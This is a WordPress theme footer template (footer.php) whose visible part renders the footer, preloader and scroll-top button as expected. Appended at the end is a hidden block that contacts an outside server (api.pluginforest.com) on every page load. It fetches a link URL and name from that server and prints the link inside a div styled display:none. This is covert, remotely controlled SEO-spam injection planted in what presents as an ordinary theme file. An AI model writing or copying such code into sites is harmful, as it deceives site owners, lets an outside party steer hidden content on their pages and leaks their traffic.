<?php
/*
 * The template for displaying footer.
 * Author & Copyright: VictorThemes
 * URL: https://victorthemes.com
 */
$sewell_id    = ( isset( $post ) ) ? $post->ID : 0;
$sewell_id    = ( is_home() ) ? get_option( 'page_for_posts' ) : $sewell_id;
$sewell_id    = ( is_woocommerce_shop() ) ? wc_get_page_id( 'shop' ) : $sewell_id;
$sewell_meta  = get_post_meta( $sewell_id, 'page_type_metabox', true );

if ($sewell_meta) {
	$sewell_hide_footer  = $sewell_meta['hide_footer'];
} else {
  $sewell_hide_footer = '';
}
if (!$sewell_hide_footer) {
  get_template_part('layouts/footer/footer', 'main' );
} ?>
</div><!-- .sewl main wrap -->
<?php
  site_preloader();
  $scroll_top_btn = cs_get_option('scroll_top_btn');
  if($scroll_top_btn == true) {
    sewell_scroll_top_button();
  }
wp_footer(); ?>

<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>
<?php
